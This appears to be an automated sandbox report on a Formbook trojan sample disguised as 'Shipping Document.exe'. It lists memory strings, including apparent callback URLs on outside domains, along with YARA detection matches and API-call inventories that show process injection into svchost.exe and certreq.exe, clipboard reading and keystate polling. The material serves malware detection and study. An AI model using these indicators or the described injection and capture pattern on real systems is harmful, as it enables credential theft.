Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: certreq.exe, 00000004.00000003.1862123042.0000000008655000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c
Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js
Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js
Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://static.fasthosts.co.uk/icons/favicon.ico
Source: certreq.exe, 00000004.00000002.3986547187.00000000060B6000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003796000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par
Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.fasthosts.co.uk/domain-names/search/?domain=$
Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_
Source: certreq.exe, 00000004.00000002.3986547187.000000000656C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003C4C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.fruitique.co.uk/opfh/?R40L6=gmtcV0/XP16HFJIc
Source: certreq.exe, 00000004.00000002.3986547187.00000000063DA000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.00000000066FE000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.00000000071FC000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000006D46000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.00000000048DC000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003ABA000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004426000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003DDE000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-199510482-1
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0103425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 1_2_0103425A
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01034458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 1_2_01034458
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0103425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 1_2_0103425A
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01020219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 1_2_01020219
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0104CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 1_2_0104CDAC

E-Banking Fraud

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: This is a third-party compiled AutoIt script. 1_2_00FC3B4C
Source: Shipping Document.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Shipping Document.exe, 00000001.00000000.1497721067.0000000001075000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_6d85c0d4-d
Source: Shipping Document.exe, 00000001.00000000.1497721067.0000000001075000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_b523132b-3
Source: Shipping Document.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_170db0d5-2
Source: Shipping Document.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_4feae052-c
Source: initial sample Static PE information: Filename: Shipping Document.exe
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042ACA3 NtClose, 2_2_0042ACA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072B60 NtClose,LdrInitializeThunk, 2_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk, 2_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03074340 NtSetContextThread, 2_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03074650 NtSuspendThread, 2_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072B80 NtQueryInformationFile, 2_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072BA0 NtEnumerateValueKey, 2_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072BE0 NtQueryValueKey, 2_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072BF0 NtAllocateVirtualMemory, 2_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072AB0 NtWaitForSingleObject, 2_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072AD0 NtReadFile, 2_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072AF0 NtWriteFile, 2_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072F30 NtCreateSection, 2_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072F60 NtCreateProcessEx, 2_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072F90 NtProtectVirtualMemory, 2_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072FA0 NtQuerySection, 2_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072FB0 NtResumeThread, 2_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072FE0 NtCreateFile, 2_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072E30 NtWriteVirtualMemory, 2_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072E80 NtReadVirtualMemory, 2_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072EA0 NtAdjustPrivilegesToken, 2_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072EE0 NtQueueApcThread, 2_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072D00 NtSetInformationFile, 2_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072D10 NtMapViewOfSection, 2_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072D30 NtUnmapViewOfSection, 2_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072DB0 NtEnumerateKey, 2_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072DD0 NtDelayExecution, 2_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072C00 NtQueryInformationProcess, 2_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072C60 NtCreateKey, 2_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072C70 NtFreeVirtualMemory, 2_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072CA0 NtQueryInformationToken, 2_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072CC0 NtQueryVirtualMemory, 2_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072CF0 NtOpenProcess, 2_2_03072CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03073010 NtOpenDirectoryObject, 2_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03073090 NtSetValueKey, 2_2_03073090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030739B0 NtGetContextThread, 2_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03073D10 NtOpenProcessToken, 2_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03073D70 NtOpenThread, 2_2_03073D70
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055835C0 NtCreateMutant,LdrInitializeThunk, 4_2_055835C0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05584650 NtSuspendThread,LdrInitializeThunk, 4_2_05584650
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05584340 NtSetContextThread,LdrInitializeThunk, 4_2_05584340
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582D10 NtMapViewOfSection,LdrInitializeThunk, 4_2_05582D10
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582D30 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_05582D30
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582DD0 NtDelayExecution,LdrInitializeThunk, 4_2_05582DD0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_05582DF0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_05582C70
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582C60 NtCreateKey,LdrInitializeThunk, 4_2_05582C60
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582CA0 NtQueryInformationToken,LdrInitializeThunk, 4_2_05582CA0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582F30 NtCreateSection,LdrInitializeThunk, 4_2_05582F30
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582FE0 NtCreateFile,LdrInitializeThunk, 4_2_05582FE0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582FB0 NtResumeThread,LdrInitializeThunk, 4_2_05582FB0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582EE0 NtQueueApcThread,LdrInitializeThunk, 4_2_05582EE0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582E80 NtReadVirtualMemory,LdrInitializeThunk, 4_2_05582E80
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_055839B0 NtGetContextThread,LdrInitializeThunk, 4_2_055839B0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582B60 NtClose,LdrInitializeThunk, 4_2_05582B60
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_05582BF0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582BE0 NtQueryValueKey,LdrInitializeThunk, 4_2_05582BE0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582BA0 NtEnumerateValueKey,LdrInitializeThunk, 4_2_05582BA0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582AD0 NtReadFile,LdrInitializeThunk, 4_2_05582AD0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582AF0 NtWriteFile,LdrInitializeThunk, 4_2_05582AF0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05583010 NtOpenDirectoryObject, 4_2_05583010
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05583090 NtSetValueKey, 4_2_05583090
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05583D70 NtOpenThread, 4_2_05583D70
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05583D10 NtOpenProcessToken, 4_2_05583D10
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582D00 NtSetInformationFile, 4_2_05582D00
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582DB0 NtEnumerateKey, 4_2_05582DB0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582C00 NtQueryInformationProcess, 4_2_05582C00
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582CC0 NtQueryVirtualMemory, 4_2_05582CC0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582CF0 NtOpenProcess, 4_2_05582CF0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582F60 NtCreateProcessEx, 4_2_05582F60
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582F90 NtProtectVirtualMemory, 4_2_05582F90
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582FA0 NtQuerySection, 4_2_05582FA0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582E30 NtWriteVirtualMemory, 4_2_05582E30
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582EA0 NtAdjustPrivilegesToken, 4_2_05582EA0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582B80 NtQueryInformationFile, 4_2_05582B80
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_05582AB0 NtWaitForSingleObject, 4_2_05582AB0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F47710 NtCreateFile, 4_2_02F47710
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F47B30 NtAllocateVirtualMemory, 4_2_02F47B30
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F47870 NtReadFile, 4_2_02F47870
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F479E0 NtClose, 4_2_02F479E0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F47950 NtDeleteFile, 4_2_02F47950
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01024021: CreateFileW,DeviceIoControl,CloseHandle, 1_2_01024021
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01018858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 1_2_01018858
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 1_2_0102545F
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FCE800 1_2_00FCE800
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FEDBB5 1_2_00FEDBB5
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FCE060 1_2_00FCE060
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0104804A 1_2_0104804A
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FD4140 1_2_00FD4140
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FE2405 1_2_00FE2405
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FF6522 1_2_00FF6522
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FF267E 1_2_00FF267E
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01040665 1_2_01040665
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FD6843 1_2_00FD6843
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FE283A 1_2_00FE283A
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FF89DF 1_2_00FF89DF
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0101EB07 1_2_0101EB07
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01028B13 1_2_01028B13
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FF6A94 1_2_00FF6A94
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FD8A0E 1_2_00FD8A0E
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01040AE2 1_2_01040AE2
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FECD61 1_2_00FECD61
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FF7006 1_2_00FF7006
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FD3190 1_2_00FD3190
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FD710E 1_2_00FD710E
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FC1287 1_2_00FC1287
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FE33C7 1_2_00FE33C7
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FEF419 1_2_00FEF419
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FE16C4 1_2_00FE16C4
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FD5680 1_2_00FD5680
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FE78D3 1_2_00FE78D3
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FD58C0 1_2_00FD58C0
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FE1BB8 1_2_00FE1BB8
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FF9D05 1_2_00FF9D05
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FCFE40 1_2_00FCFE40
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FEBFE6 1_2_00FEBFE6
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_00FE1FD0 1_2_00FE1FD0
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01E53680 1_2_01E53680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403040 2_2_00403040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040F873 2_2_0040F873
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042D0B3 2_2_0042D0B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401190 2_2_00401190
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041619E 2_2_0041619E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004161A3 2_2_004161A3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004022C0 2_2_004022C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401AFB 2_2_00401AFB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040FA93 2_2_0040FA93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004022BA 2_2_004022BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401B00 2_2_00401B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040DB13 2_2_0040DB13
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004024B0 2_2_004024B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FA352 2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031003E6 2_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C02C0 2_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030100 2_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C8158 2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F41A2 2_2_030F41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031001AA 2_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F81CC 2_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03064750 2_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303C7C0 2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305C6E0 2_2_0305C6E0
